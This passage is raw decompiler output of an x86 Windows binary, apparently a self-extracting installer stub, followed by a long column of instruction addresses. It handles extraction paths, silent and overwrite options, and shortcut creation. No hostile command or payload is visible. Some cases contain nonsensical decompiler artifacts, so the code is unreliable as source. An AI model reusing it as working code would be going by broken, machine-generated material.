									} else {
										__ebp - 0x103c = E00C3FAB1(__ebp - 0x103c, __edi, 0x800);
										goto L67;
									}
								}
							case 4:
								__eflags =  *0xc795fc - 1;
								__eflags = __eax - 0xc795fc;
								 *__edi =  *__edi + __ecx;
								__eflags =  *(__ebx + 6) & __bl;
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
							case 5:
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__ecx = 0;
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									L84:
									 *0xc775d2 = __cl;
									 *0xc775d3 = 1;
									goto L167;
								}
								__eax = __eax - 0x30;
								__eflags = __eax;
								if(__eax == 0) {
									 *0xc775d2 = __cl;
									L83:
									 *0xc775d3 = __cl;
									goto L167;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L84;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax != 0) {
									goto L167;
								}
								 *0xc775d2 = 1;
								goto L83;
							case 6:
								__eflags = __ebx - 4;
								if(__ebx != 4) {
									goto L94;
								}
								__eax = __ebp - 0x5c84;
								__eax = E00C52B69(__ebp - 0x5c84, __eax, L"<>");
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax == 0) {
									goto L94;
								}
								_push(__edi);
								goto L93;
							case 7:
								__eflags = __ebx - 1;
								if(__eflags != 0) {
									L115:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										__eflags =  *0xc795fc;
										if( *0xc795fc == 0) {
											 *0xc795fc = 2;
										}
										 *0xc785f8 = 1;
									}
									goto L167;
								}
								__eax = __ebp - 0x7c84;
								__edi = 0x800;
								GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
								E00C3AEA5(__eflags, __ebp - 0x7c84, 0x800) = 0;
								__esi = 0;
								_push(0);
								while(1) {
									_push( *0xc6d5f8);
									__ebp - 0x7c84 = E00C33E41(0xc785fa, __edi, L"%s%s%u", __ebp - 0x7c84);
									__eax = E00C39E6B(0xc785fa);
									__eflags = __al;
									if(__al == 0) {
										break;
									}
									__esi =  &(__esi->i);
									__eflags = __esi;
									_push(__esi);
								}
								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xc785fa);
								__eflags =  *(__ebp - 0x5c84);
								if( *(__ebp - 0x5c84) == 0) {
									goto L167;
								}
								__eflags =  *0xc85d02;
								if( *0xc85d02 != 0) {
									goto L167;
								}
								__eax = 0;
								 *(__ebp - 0x143c) = __ax;
								__eax = __ebp - 0x5c84;
								_push(0x2c);
								_push(__ebp - 0x5c84);
								__eax = E00C50BB8(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									L111:
									__eflags =  *(__ebp - 0x143c);
									if( *(__ebp - 0x143c) == 0) {
										__ebp - 0x1bc8c = __ebp - 0x5c84;
										E00C3FAB1(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
										__ebp - 0x143c = E00C3FAB1(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
									}
									__ebp - 0x5c84 = E00C49C4F(__ebp - 0x5c84);
									__eax = 0;
									 *(__ebp - 0x4c84) = __ax;
									__ebp - 0x143c = __ebp - 0x5c84;
									__eax = E00C49735( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
									__eflags = __eax - 6;
									if(__eax == 6) {
										goto L167;
									} else {
										__eax = 0;
										__eflags = 0;
										 *0xc775d7 = 1;
										 *0xc785fa = __ax;
										__eax = EndDialog( *(__ebp + 8), 1);
										goto L115;
									}
								}
								__edx = 0;
								__esi = 0;
								__eflags =  *(__ebp - 0x5c84) - __dx;
								if( *(__ebp - 0x5c84) == __dx) {
									goto L111;
								}
								__ecx = 0;
								__eax = __ebp - 0x5c84;
								while(1) {
									__eflags =  *__eax - 0x40;
									if( *__eax == 0x40) {
										break;
									}
									__esi =  &(__esi->i);
									__eax = __ebp - 0x5c84;
									__ecx = __esi + __esi;
									__eax = __ebp - 0x5c84 + __ecx;
									__eflags =  *__eax - __dx;
									if( *__eax != __dx) {
										continue;
									}
									goto L111;
								}
								__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
								__ebp - 0x143c = E00C3FAB1(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
								__eax = 0;
								__eflags = 0;
								 *(__ebp + __esi * 2 - 0x5c84) = __ax;
								goto L111;
							case 8:
								__eflags = __ebx - 3;
								if(__ebx == 3) {
									__eflags =  *(__ebp - 0x5c84) - __di;
									if(__eflags != 0) {
										__eax = __ebp - 0x5c84;
										_push(__ebp - 0x5c84);
										__eax = E00C5668C(__ebx, __edi);
										_pop(__ecx);
										 *0xc8de1c = __eax;
									}
									__eax = __ebp + 0xc;
									_push(__ebp + 0xc);
									 *0xc8de18 = E00C4A2AE(__ecx, __edx, __eflags);
								}
								 *0xc85d03 = 1;
								goto L167;
							case 9:
								__eflags = __ebx - 5;
								if(__ebx != 5) {
									L94:
									 *0xc8de20 = 1;
									goto L167;
								}
								_push(1);
								L93:
								__eax = __ebp - 0x5c84;
								_push(__ebp - 0x5c84);
								_push( *(__ebp + 8));
								__eax = E00C4C431();
								goto L94;
							case 0xa:
								__eflags = __ebx - 6;
								if(__ebx != 6) {
									goto L167;
								}
								__eax = 0;
								 *(__ebp - 0x2c3c) = __ax;
								__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
								__eax = E00C559C0( *(__ebp - 0x1bc8c) & 0x0000ffff);
								_push(0x800);
								__eflags = __eax - 0x50;
								if(__eax == 0x50) {
									_push(0xc8ad0a);
									__eax = __ebp - 0x2c3c;
									_push(__ebp - 0x2c3c);
									__eax = E00C3FAB1();
									 *(__ebp - 0x14) = 2;
								} else {
									__eflags = __eax - 0x54;
									__eax = __ebp - 0x2c3c;
									if(__eflags == 0) {
										_push(0xc89d0a);
										_push(__eax);
										__eax = E00C3FAB1();
										 *(__ebp - 0x14) = 7;
									} else {
										_push(0xc8bd0a);
										_push(__eax);
										__eax = E00C3FAB1();
										 *(__ebp - 0x14) = 0x10;
									}
								}
								__eax = 0;
								 *(__ebp - 0x9c8c) = __ax;
								 *(__ebp - 0x1c3c) = __ax;
								__ebp - 0x19c8c = __ebp - 0x6c84;
								__eax = E00C54D7E(__ebp - 0x6c84, __ebp - 0x19c8c);
								_pop(__ecx);
								_pop(__ecx);
								_push(0x22);
								_pop(__ebx);
								__eflags =  *(__ebp - 0x6c84) - __bx;
								if( *(__ebp - 0x6c84) != __bx) {
									__ebp - 0x6c84 = E00C39E6B(__ebp - 0x6c84);
									__eflags = __al;
									if(__al != 0) {
										goto L152;
									}
									__ebx = __edi;
									__esi = __ebp - 0x6c84;
									__eflags =  *(__ebp - 0x6c84) - __bx;
									if( *(__ebp - 0x6c84) == __bx) {
										goto L152;
									}
									_push(0x20);
									_pop(__ecx);
									do {
										__eax = __esi->i & 0x0000ffff;
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L140:
											__edi = __eax;
											__eax = 0;
											__esi->i = __ax;
											__ebp - 0x6c84 = E00C39E6B(__ebp - 0x6c84);
											__eflags = __al;
											if(__al == 0) {
												__esi->i = __di;
												L148:
												_push(0x20);
												_pop(__ecx);
												__edi = 0;
												__eflags = 0;
												goto L149;
											}
											_push(0x2f);
											_pop(__eax);
											__ebx = __esi;
											__eflags = __di - __ax;
											if(__di != __ax) {
												_push(0x20);
												_pop(__eax);
												do {
													__esi =  &(__esi->i);
													__eflags = __esi->i - __ax;
												} while (__esi->i == __ax);
												_push(__esi);
												__eax = __ebp - 0x1c3c;
												L146:
												_push(__eax);
												__eax = E00C54D7E();
												_pop(__ecx);
												_pop(__ecx);
												 *__ebx = __di;
												goto L148;
											}
											 *(__ebp - 0x1c3c) = __ax;
											__eax =  &(__esi->i);
											_push( &(__esi->i));
											__eax = __ebp - 0x1c3a;
											goto L146;
										}
										_push(0x2f);
										_pop(__edx);
										__eflags = __ax - __dx;
										if(__ax != __dx) {
											goto L149;
										}
										goto L140;
										L149:
										__esi =  &(__esi->i);
										__eflags = __esi->i - __di;
									} while (__esi->i != __di);
									__eflags = __ebx;
									if(__ebx != 0) {
										__eax = 0;
										__eflags = 0;
										 *__ebx = __ax;
									}
									goto L152;
								} else {
									__ebp - 0x19c8a = __ebp - 0x6c84;
									E00C54D7E(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
									_push(__ebx);
									_push(__ebp - 0x6c82);
									__eax = E00C50BB8(__ecx);
									__esp = __esp + 0x10;
									__eflags = __eax;
									if(__eax != 0) {
										__ecx = 0;
										 *__eax = __cx;
										__ebp - 0x1c3c = E00C54D7E(__ebp - 0x1c3c, __ebp - 0x1c3c);
										_pop(__ecx);
										_pop(__ecx);
									}
									L152:
									__eflags =  *(__ebp - 0x11c8c);
									__ebx = 0x800;
									if( *(__ebp - 0x11c8c) != 0) {
										_push(0x800);
										__eax = __ebp - 0x9c8c;
										_push(__ebp - 0x9c8c);
										__eax = __ebp - 0x11c8c;
										_push(__ebp - 0x11c8c);
										__eax = E00C3AED7();
									}
									_push(__ebx);
									__eax = __ebp - 0xbc8c;
									_push(__ebp - 0xbc8c);
									__eax = __ebp - 0x6c84;
									_push(__ebp - 0x6c84);
									__eax = E00C3AED7();
									__eflags =  *(__ebp - 0x2c3c);
									if(__eflags == 0) {
										__ebp - 0x2c3c = E00C4A24E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
									}
									__ebp - 0x2c3c = E00C3AEA5(__eflags, __ebp - 0x2c3c, __ebx);
									__eflags =  *((short*)(__ebp - 0x17c8c));
									if(__eflags != 0) {
										__ebp - 0x17c8c = __ebp - 0x2c3c;
										E00C3FA89(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
										__eax = E00C3AEA5(__eflags, __ebp - 0x2c3c, __ebx);
									}
									__ebp - 0x2c3c = __ebp - 0xcc8c;
									__eax = E00C54D7E(__ebp - 0xcc8c, __ebp - 0x2c3c);
									__eflags =  *(__ebp - 0x13c8c);
									__eax = __ebp - 0x13c8c;
									_pop(__ecx);
									_pop(__ecx);
									if(__eflags == 0) {
										__eax = __ebp - 0x19c8c;
									}
									__ebp - 0x2c3c = E00C3FA89(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
									__eax = __ebp - 0x2c3c;
									__eflags = E00C3B153(__ebp - 0x2c3c);
									if(__eflags == 0) {
										L162:
										__ebp - 0x2c3c = E00C3FA89(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
										goto L163;
									} else {
										__eflags = __eax;
										if(__eflags == 0) {
											L163:
											_push(1);
											__eax = __ebp - 0x2c3c;
											_push(__ebp - 0x2c3c);
											E00C39D3A(__ecx, __ebp) = __ebp - 0xbc8c;
											__ebp - 0xac8c = E00C54D7E(__ebp - 0xac8c, __ebp - 0xbc8c);
											_pop(__ecx);
											_pop(__ecx);
											__ebp - 0xac8c = E00C3B98D(__eflags, __ebp - 0xac8c);
											__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
											__eax = __ebp - 0x1c3c;
											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
											__edx = __ebp - 0x9c8c;
											__esi = __ebp - 0xac8c;
											asm("sbb ecx, ecx");
											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
											 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
											asm("sbb eax, eax");
											__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
											 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
											__eax = __ebp - 0x15c8c;
											asm("sbb edx, edx");
											__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
											E00C49D41(__ebp - 0x15c8c) = __ebp - 0x2c3c;
											__ebp - 0xbc8c = E00C49450(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
											__eflags =  *(__ebp - 0xcc8c);
											if( *(__ebp - 0xcc8c) != 0) {
												_push(__edi);
												__eax = __ebp - 0xcc8c;
												_push(__ebp - 0xcc8c);
												_push(5);
												_push(0x1000);
												__eax =  *0xc6def8();
											}
											goto L167;
										}
										goto L162;
									}
								}
							case 0xb:
								__eflags = __ebx - 7;
								if(__ebx == 7) {
									 *0xc79600 = 1;
								}
								goto L167;
							case 0xc:
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__eax = E00C559C0( *(__ebp - 0x5c84) & 0x0000ffff);
								__eflags = __eax - 0x46;
								if(__eax == 0x46) {
									 *0xc775d4 = 1;
								} else {
									__eflags = __eax - 0x55;
									if(__eax == 0x55) {
										 *0xc775d5 = 1;
									} else {
										__eax = 0;
										 *0xc775d4 = __al;
										 *0xc775d5 = __al;
									}
								}
								goto L167;
							case 0xd:
								 *0xc8de21 = 1;
								__eax = __eax + 0xc8de21;
								_t112 = __esi + 0x39;
								 *_t112 =  *(__esi + 0x39) + __esp;
								__eflags =  *_t112;
								__ebp = 0xffffa37c;
								if( *_t112 != 0) {
									_t114 = __ebp - 0x5c84; // 0xffff46f8
									__eax = _t114;
									_push(_t114);
									 *0xc6d5fc = E00C413FC();
								}
								goto L167;
						}
						L4:
						_t220 = E00C49E24(_t220, _t296);
						_t296 = _t296 + 0x2000;
						_t293 = _t293 - 1;
						if(_t293 != 0) {
							goto L4;
						} else {
							_t297 = _t293;
							goto L6;
						}
						L167:
						_push(0x1000);
						_t205 = _t302 - 0xe; // 0xffffa36e
						_t206 = _t302 - 0xd; // 0xffffa36f
						_t207 = _t302 - 0x5c84; // 0xffff46f8
						_t208 = _t302 - 0xfc8c; // 0xfffea6f0
						_push( *((intOrPtr*)(_t302 + 0xc)));
						_t215 = E00C4A156();
						_t278 =  *((intOrPtr*)(_t302 + 0x10));
						 *((intOrPtr*)(_t302 + 0xc)) = _t215;
					} while (_t215 != 0);
				}
			}











                                            0x00c4b4c7
                                            0x00c4b4cc
                                            0x00c4b4d1
                                            0x00c4b4d6
                                            0x00c4b4df
                                            0x00c4c0c7
                                            0x00c4c0ca
                                            0x00c4c0d4
                                            0x00c4c0d4
                                            0x00c4b4e5
                                            0x00c4b4ed
                                            0x00c4b4f1
                                            0x00c4b4f8
                                            0x00c4b4ff
                                            0x00c4b500
                                            0x00c4b503
                                            0x00c4b50a
                                            0x00c4b50f
                                            0x00c4b516
                                            0x00c4b51b
                                            0x00c4b51d
                                            0x00c4b523
                                            0x00c4b529
                                            0x00c4b529
                                            0x00000000
                                            0x00c4b53e
                                            0x00c4b555
                                            0x00c4b559
                                            0x00000000
                                            0x00c4b55b
                                            0x00000000
                                            0x00c4b55b
                                            0x00c4b559
                                            0x00c4b563
                                            0x00000000
                                            0x00000000
                                            0x00c4b569
                                            0x00000000
                                            0x00c4b570
                                            0x00c4b573
                                            0x00000000
                                            0x00000000
                                            0x00c4b579
                                            0x00c4b586
                                            0x00c4b5ac
                                            0x00c4b5b7
                                            0x00c4b5c1
                                            0x00c4b5cc
                                            0x00c4b5d1
                                            0x00c4b5d9
                                            0x00c4b5df
                                            0x00c4b5e4
                                            0x00c4b5e6
                                            0x00c4b74b
                                            0x00c4b74b
                                            0x00c4b755
                                            0x00000000
                                            0x00c4b5ec
                                            0x00c4b5f2
                                            0x00c4b614
                                            0x00c4b623
                                            0x00c4b630
                                            0x00c4b641
                                            0x00c4b644
                                            0x00c4b647
                                            0x00c4b65a
                                            0x00c4b661
                                            0x00c4b666
                                            0x00c4b668
                                            0x00000000
                                            0x00000000
                                            0x00c4b66e
                                            0x00c4b675
                                            0x00c4b67a
                                            0x00c4b67f
                                            0x00c4b68b
                                            0x00c4b690
                                            0x00c4b693
                                            0x00c4b69a
                                            0x00c4b69c
                                            0x00c4b69d
                                            0x00c4b6a7
                                            0x00c4b6ad
                                            0x00c4b6ae
                                            0x00000000
                                            0x00c4b6ae
                                            0x00c4b650
                                            0x00c4b656
                                            0x00c4b658
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4b6b4
                                            0x00c4b6bb
                                            0x00c4b6bd
                                            0x00c4b6c0
                                            0x00c4b730
                                            0x00c4b730
                                            0x00c4b738
                                            0x00c4b73e
                                            0x00c4b743
                                            0x00c4b745
                                            0x00c4b5f4
                                            0x00c4b5f9
                                            0x00c4b601
                                            0x00c4b607
                                            0x00c4b60e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4b60e
                                            0x00000000
                                            0x00c4b745
                                            0x00c4b6c9
                                            0x00c4b6cf
                                            0x00c4b6d1
                                            0x00000000
                                            0x00c4b6d3
                                            0x00c4b6d3
                                            0x00c4b6d5
                                            0x00c4b6d6
                                            0x00c4b6da
                                            0x00c4b6f2
                                            0x00c4b6f7
                                            0x00c4b701
                                            0x00c4b703
                                            0x00c4b706
                                            0x00c4b6d8
                                            0x00c4b6d8
                                            0x00c4b6d9
                                            0x00000000
                                            0x00c4b708
                                            0x00c4b716
                                            0x00c4b71c
                                            0x00c4b71e
                                            0x00c4b72a
                                            0x00c4b72a
                                            0x00000000
                                            0x00c4b71e
                                            0x00c4b706
                                            0x00c4b6d1
                                            0x00000000
                                            0x00c4b75f
                                            0x00c4b761
                                            0x00c4b7b4
                                            0x00c4b7b9
                                            0x00c4b7c2
                                            0x00c4b7c3
                                            0x00c4b7c9
                                            0x00c4b7ce
                                            0x00c4b7d1
                                            0x00c4b7d3
                                            0x00c4b7d5
                                            0x00c4b7da
                                            0x00c4b7dc
                                            0x00c4b7de
                                            0x00c4b7de
                                            0x00c4b7e0
                                            0x00c4b7e0
                                            0x00c4b7e5
                                            0x00c4b7ea
                                            0x00c4b7eb
                                            0x00c4b7eb
                                            0x00c4b7ec
                                            0x00c4b7ee
                                            0x00c4b7f5
                                            0x00c4b7fa
                                            0x00c4b7ee
                                            0x00000000
                                            0x00000000
                                            0x00c4b800
                                            0x00c4b802
                                            0x00c4b812
                                            0x00c4b812
                                            0x00000000
                                            0x00000000
                                            0x00c4b81d
                                            0x00c4b81f
                                            0x00000000
                                            0x00000000
                                            0x00c4b825
                                            0x00c4b82c
                                            0x00000000
                                            0x00000000
                                            0x00c4b832
                                            0x00c4b834
                                            0x00c4b83a
                                            0x00c4b83c
                                            0x00c4b843
                                            0x00c4b844
                                            0x00c4b84b
                                            0x00c4b84d
                                            0x00c4b84d
                                            0x00c4b854
                                            0x00c4b859
                                            0x00c4b85f
                                            0x00c4b861
                                            0x00000000
                                            0x00c4b867
                                            0x00c4b867
                                            0x00c4b86a
                                            0x00c4b86c
                                            0x00c4b86d
                                            0x00c4b870
                                            0x00c4b899
                                            0x00c4b899
                                            0x00c4b89c
                                            0x00c4b981
                                            0x00c4b98a
                                            0x00c4b98f
                                            0x00c4b98f
                                            0x00c4b991
                                            0x00c4b991
                                            0x00c4b993
                                            0x00c4b995
                                            0x00c4b99c
                                            0x00c4b9a1
                                            0x00c4b9a2
                                            0x00c4b9a3
                                            0x00c4b9a5
                                            0x00c4b9a7
                                            0x00c4b9ab
                                            0x00c4b9ad
                                            0x00c4b9ad
                                            0x00c4b9af
                                            0x00c4b9af
                                            0x00c4b9ab
                                            0x00c4b9b3
                                            0x00c4b9b9
                                            0x00c4b9c6
                                            0x00c4b9cd
                                            0x00c4b9dd
                                            0x00c4b9e7
                                            0x00c4b9ef
                                            0x00c4b9fb
                                            0x00c4b9fd
                                            0x00c4ba05
                                            0x00c4ba0a
                                            0x00c4ba0b
                                            0x00c4ba0c
                                            0x00c4ba0e
                                            0x00c4ba1b
                                            0x00c4ba24
                                            0x00c4ba24
                                            0x00000000
                                            0x00c4ba0e
                                            0x00c4b8a2
                                            0x00c4b8a5
                                            0x00c4b8b2
                                            0x00c4b8b2
                                            0x00c4b8b5
                                            0x00c4b8b7
                                            0x00c4b8b8
                                            0x00c4b8ba
                                            0x00c4b8bb
                                            0x00c4b8c0
                                            0x00c4b8c5
                                            0x00c4b8cb
                                            0x00c4b8cd
                                            0x00c4b8cf
                                            0x00c4b8d2
                                            0x00c4b8d9
                                            0x00c4b8da
                                            0x00c4b8e0
                                            0x00c4b8e1
                                            0x00c4b8e4
                                            0x00c4b8e5
                                            0x00c4b8e6
                                            0x00c4b8eb
                                            0x00c4b8ee
                                            0x00c4b8f4
                                            0x00c4b8fd
                                            0x00c4b900
                                            0x00c4b905
                                            0x00c4b907
                                            0x00c4b909
                                            0x00c4b90b
                                            0x00c4b90b
                                            0x00c4b90d
                                            0x00c4b90d
                                            0x00c4b90f
                                            0x00c4b90f
                                            0x00c4b917
                                            0x00c4b91e
                                            0x00c4b920
                                            0x00c4b927
                                            0x00c4b92d
                                            0x00c4b92f
                                            0x00c4b930
                                            0x00c4b938
                                            0x00c4b947
                                            0x00c4b947
                                            0x00c4b938
                                            0x00c4b952
                                            0x00c4b954
                                            0x00c4b963
                                            0x00c4b969
                                            0x00c4b96f
                                            0x00c4b97a
                                            0x00c4b97a
                                            0x00000000
                                            0x00c4b96f
                                            0x00c4b8a7
                                            0x00c4b8ac
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4b8ac
                                            0x00c4b872
                                            0x00c4b876
                                            0x00000000
                                            0x00000000
                                            0x00c4b878
                                            0x00c4b87b
                                            0x00c4b87d
                                            0x00c4b880
                                            0x00000000
                                            0x00c4b886
                                            0x00c4b88f
                                            0x00000000
                                            0x00c4b88f
                                            0x00c4b880
                                            0x00000000
                                            0x00c4ba2b
                                            0x00c4ba2c
                                            0x00c4ba31
                                            0x00c4ba33
                                            0x00c4ba36
                                            0x00c4ba36
                                            0x00000000
                                            0x00c4ba6c
                                            0x00c4ba73
                                            0x00c4ba75
                                            0x00c4ba75
                                            0x00c4ba77
                                            0x00c4baa6
                                            0x00c4baa6
                                            0x00c4baac
                                            0x00000000
                                            0x00c4baac
                                            0x00c4ba79
                                            0x00c4ba79
                                            0x00c4ba7c
                                            0x00c4ba95
                                            0x00c4ba9b
                                            0x00c4ba9b
                                            0x00000000
                                            0x00c4ba9b
                                            0x00c4ba7e
                                            0x00c4ba7e
                                            0x00c4ba81
                                            0x00000000
                                            0x00000000
                                            0x00c4ba83
                                            0x00c4ba83
                                            0x00c4ba86
                                            0x00000000
                                            0x00000000
                                            0x00c4ba8c
                                            0x00000000
                                            0x00000000
                                            0x00c4baf9
                                            0x00c4bafc
                                            0x00000000
                                            0x00000000
                                            0x00c4bafe
                                            0x00c4bb0a
                                            0x00c4bb0f
                                            0x00c4bb10
                                            0x00c4bb11
                                            0x00c4bb13
                                            0x00000000
                                            0x00000000
                                            0x00c4bb15
                                            0x00000000
                                            0x00000000
                                            0x00c4bb5b
                                            0x00c4bb5e
                                            0x00c4bcdf
                                            0x00c4bcdf
                                            0x00c4bce2
                                            0x00c4bce8
                                            0x00c4bcef
                                            0x00c4bcf1
                                            0x00c4bcf1
                                            0x00c4bcfb
                                            0x00c4bcfb
                                            0x00000000
                                            0x00c4bce2
                                            0x00c4bb64
                                            0x00c4bb6a
                                            0x00c4bb78
                                            0x00c4bb84
                                            0x00c4bb86
                                            0x00c4bb88
                                            0x00c4bb8d
                                            0x00c4bb8d
                                            0x00c4bba5
                                            0x00c4bbb2
                                            0x00c4bbb7
                                            0x00c4bbb9
                                            0x00000000
                                            0x00000000
                                            0x00c4bb8b
                                            0x00c4bb8b
                                            0x00c4bb8c
                                            0x00c4bb8c
                                            0x00c4bbc5
                                            0x00c4bbcb
                                            0x00c4bbd3
                                            0x00000000
                                            0x00000000
                                            0x00c4bbd9
                                            0x00c4bbe0
                                            0x00000000
                                            0x00000000
                                            0x00c4bbe6
                                            0x00c4bbe8
                                            0x00c4bbef
                                            0x00c4bbf5
                                            0x00c4bbf7
                                            0x00c4bbf8
                                            0x00c4bbfd
                                            0x00c4bbfe
                                            0x00c4bbff
                                            0x00c4bc01
                                            0x00c4bc55
                                            0x00c4bc55
                                            0x00c4bc5d
                                            0x00c4bc6b
                                            0x00c4bc7c
                                            0x00c4bc8a
                                            0x00c4bc8a
                                            0x00c4bc96
                                            0x00c4bc9b
                                            0x00c4bc9d
                                            0x00c4bcad
                                            0x00c4bcb7
                                            0x00c4bcbc
                                            0x00c4bcbf
                                            0x00000000
                                            0x00c4bcc5
                                            0x00c4bcca
                                            0x00c4bcca
                                            0x00c4bccc
                                            0x00c4bcd3
                                            0x00c4bcd9
                                            0x00000000
                                            0x00c4bcd9
                                            0x00c4bcbf
                                            0x00c4bc03
                                            0x00c4bc05
                                            0x00c4bc07
                                            0x00c4bc0e
                                            0x00000000
                                            0x00000000
                                            0x00c4bc10
                                            0x00c4bc12
                                            0x00c4bc18
                                            0x00c4bc18
                                            0x00c4bc1c
                                            0x00000000
                                            0x00000000
                                            0x00c4bc1e
                                            0x00c4bc1f
                                            0x00c4bc25
                                            0x00c4bc28
                                            0x00c4bc2a
                                            0x00c4bc2d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4bc2f
                                            0x00c4bc3c
                                            0x00c4bc46
                                            0x00c4bc4b
                                            0x00c4bc4b
                                            0x00c4bc4d
                                            0x00000000
                                            0x00000000
                                            0x00c4bd07
                                            0x00c4bd0a
                                            0x00c4bd0c
                                            0x00c4bd13
                                            0x00c4bd15
                                            0x00c4bd1b
                                            0x00c4bd1c
                                            0x00c4bd21
                                            0x00c4bd22
                                            0x00c4bd22
                                            0x00c4bd27
                                            0x00c4bd2a
                                            0x00c4bd30
                                            0x00c4bd30
                                            0x00c4bd35
                                            0x00000000
                                            0x00000000
                                            0x00c4bd41
                                            0x00c4bd44
                                            0x00c4bb25
                                            0x00c4bb25
                                            0x00000000
                                            0x00c4bb25
                                            0x00c4bd4a
                                            0x00c4bb16
                                            0x00c4bb16
                                            0x00c4bb1c
                                            0x00c4bb1d
                                            0x00c4bb20
                                            0x00000000
                                            0x00000000
                                            0x00c4bd51
                                            0x00c4bd54
                                            0x00000000
                                            0x00000000
                                            0x00c4bd5a
                                            0x00c4bd5c
                                            0x00c4bd63
                                            0x00c4bd6b
                                            0x00c4bd71
                                            0x00c4bd76
                                            0x00c4bd79
                                            0x00c4bdae
                                            0x00c4bdb3
                                            0x00c4bdb9
                                            0x00c4bdba
                                            0x00c4bdbf
                                            0x00c4bd7b
                                            0x00c4bd7b
                                            0x00c4bd7e
                                            0x00c4bd84
                                            0x00c4bd9a
                                            0x00c4bd9f
                                            0x00c4bda0
                                            0x00c4bda5
                                            0x00c4bd86
                                            0x00c4bd86
                                            0x00c4bd8b
                                            0x00c4bd8c
                                            0x00c4bd91
                                            0x00c4bd91
                                            0x00c4bd84
                                            0x00c4bdc6
                                            0x00c4bdc8
                                            0x00c4bdcf
                                            0x00c4bddd
                                            0x00c4bde4
                                            0x00c4bde9
                                            0x00c4bdea
                                            0x00c4bdeb
                                            0x00c4bded
                                            0x00c4bdee
                                            0x00c4bdf5
                                            0x00c4be45
                                            0x00c4be4a
                                            0x00c4be4c
                                            0x00000000
                                            0x00000000
                                            0x00c4be52
                                            0x00c4be54
                                            0x00c4be5a
                                            0x00c4be61
                                            0x00000000
                                            0x00000000
                                            0x00c4be63
                                            0x00c4be65
                                            0x00c4be66
                                            0x00c4be66
                                            0x00c4be69
                                            0x00c4be6c
                                            0x00c4be76
                                            0x00c4be76
                                            0x00c4be78
                                            0x00c4be7a
                                            0x00c4be84
                                            0x00c4be89
                                            0x00c4be8b
                                            0x00c4bec9
                                            0x00c4becc
                                            0x00c4becc
                                            0x00c4bece
                                            0x00c4becf
                                            0x00c4becf
                                            0x00000000
                                            0x00c4becf
                                            0x00c4be8d
                                            0x00c4be8f
                                            0x00c4be90
                                            0x00c4be92
                                            0x00c4be95
                                            0x00c4beaa
                                            0x00c4beac
                                            0x00c4bead
                                            0x00c4bead
                                            0x00c4beb0
                                            0x00c4beb0
                                            0x00c4beb5
                                            0x00c4beb6
                                            0x00c4bebc
                                            0x00c4bebc
                                            0x00c4bebd
                                            0x00c4bec2
                                            0x00c4bec3
                                            0x00c4bec4
                                            0x00000000
                                            0x00c4bec4
                                            0x00c4be97
                                            0x00c4be9e
                                            0x00c4bea1
                                            0x00c4bea2
                                            0x00000000
                                            0x00c4bea2
                                            0x00c4be6e
                                            0x00c4be70
                                            0x00c4be71
                                            0x00c4be74
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4bed1
                                            0x00c4bed1
                                            0x00c4bed4
                                            0x00c4bed4
                                            0x00c4bed9
                                            0x00c4bedb
                                            0x00c4bedd
                                            0x00c4bedd
                                            0x00c4bedf
                                            0x00c4bedf
                                            0x00000000
                                            0x00c4bdf7
                                            0x00c4bdfe
                                            0x00c4be0a
                                            0x00c4be10
                                            0x00c4be11
                                            0x00c4be12
                                            0x00c4be17
                                            0x00c4be1a
                                            0x00c4be1c
                                            0x00c4be22
                                            0x00c4be24
                                            0x00c4be32
                                            0x00c4be37
                                            0x00c4be38
                                            0x00c4be38
                                            0x00c4bee2
                                            0x00c4bee2
                                            0x00c4beea
                                            0x00c4beef
                                            0x00c4bef1
                                            0x00c4bef2
                                            0x00c4bef8
                                            0x00c4bef9
                                            0x00c4beff
                                            0x00c4bf00
                                            0x00c4bf00
                                            0x00c4bf05
                                            0x00c4bf06
                                            0x00c4bf0c
                                            0x00c4bf0d
                                            0x00c4bf13
